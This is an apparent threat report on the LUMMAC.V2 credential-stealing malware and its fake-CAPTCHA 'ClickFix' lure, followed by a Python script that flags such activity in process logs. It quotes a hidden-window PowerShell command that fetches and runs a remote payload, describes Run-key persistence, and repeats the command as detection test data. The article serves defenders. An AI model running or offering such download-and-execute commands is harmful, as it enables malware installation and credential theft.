Cybersecurity researchers have recently uncovered a sophisticated evolution of the LUMMAC credential-stealing malware, now rewritten from C to C++ and operating with enhanced capabilities. This new variant, designated LUMMAC.V2, targets a broad spectrum of applications, including web browsers, cryptocurrency wallets, password managers, remote desktop applications, email clients, and instant messaging platforms.
The primary function of LUMMAC.V2 is to exfiltrate sensitive information such as credentials, login details, emails, personal data, system information, screenshots, and cookies. Once collected, this data is compressed into a ZIP archive and transmitted over HTTP connections to the attacker’s command-and-control (C2) server.
What sets LUMMAC.V2 apart is its reliance on social engineering tactics rather than exploiting technical vulnerabilities. The malware propagates through malicious links embedded in search results, particularly those related to cracked software, popular movies, or music releases. Unsuspecting users who click on these links are redirected to deceptive websites that present fake security verification pages, often mimicking CAPTCHA challenges.
A key component of LUMMAC.V2’s attack methodology is the ClickFix technique, which tricks users into running a command without realising what it does. Upon landing on a fake CAPTCHA page, victims are instructed to press Windows+R to open the Run dialog box, then press CTRL+V to paste a command that has been surreptitiously copied to their clipboard, and finally press Enter to execute it.
The underlying PowerShell command runs with the `-W Hidden` (`-WindowStyle Hidden`) parameter so that no console window appears. A typical command looks like:
```powershell
PowerShell.exe -W Hidden -command $url = 'https://finalstepgo[.]com/uploads/pnk3.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
```
This command downloads and executes additional malicious payloads, establishing persistence by creating registry entries under `HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`. This ensures the malware executes automatically at each system startup, maintaining its presence on infected systems.
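As an added example (not code from the original article), a small Python triage script that scores constructed process-creation records for the ClickFix pattern described above: PowerShell launched from the Run dialog (assumed here to show `explorer.exe` as the parent process), a hidden window, a remote download call, and in-memory execution via `iex`. The record layout, field names and sample command lines are constructed for illustration, not real telemetry.

```python
import re

# Constructed sample records modelled on process-creation telemetry
# (parent image, image, command line). Not real logs; the URL is a placeholder.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "PowerShell.exe -W Hidden -command $url = 'https://example.invalid/pnk3.txt'; "
                "$response = Invoke-WebRequest -Uri $url -UseBasicParsing; "
                "$text = $response.Content; iex $text"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"},
    {"parent": r"C:\Program Files\Vendor\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -W Hidden -File C:\\ProgramData\\vendor\\update.ps1"},
]

# -W / -WindowStyle may be abbreviated, and so may Hidden; match the prefixes.
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w(?:i\w*)?\s+h(?:i\w*)?")
# Common download primitives seen in PowerShell one-liners.
DOWNLOADER = re.compile(r"(?i)\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|net\.webclient)\b")
# Invoke-Expression run on whatever was fetched (the "cradle").
EXEC_CRADLE = re.compile(r"(?i)(?:^|[\s;|(])(?:iex|invoke-expression)\b")


def score_event(ev):
    """Return (score, reasons) for one process-creation record."""
    reasons = []
    if not ev["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, reasons
    cmd = ev["cmdline"]
    if ev["parent"].lower().endswith("explorer.exe"):
        reasons.append("PowerShell spawned by the shell (Run dialog or user launch)")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window requested")
    if DOWNLOADER.search(cmd):
        reasons.append("remote download in command line")
    if EXEC_CRADLE.search(cmd):
        reasons.append("in-memory execution (iex) of fetched content")
    return len(reasons), reasons


def flag_clickfix(events, threshold=3):
    """Return [(cmdline, reasons)] for records scoring at or above threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["cmdline"], reasons))
    return hits
```

The threshold keeps a lone hidden-window flag (common in legitimate scheduled scripts) from alerting; only the combination of shell parent, hidden window, download and `iex` reaches it.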
The LUMMAC.V2 campaign represents a significant threat due to its extensive data theft capabilities and its exploitation of human behavior rather than technical vulnerabilities, making traditional security measures less effective at prevention.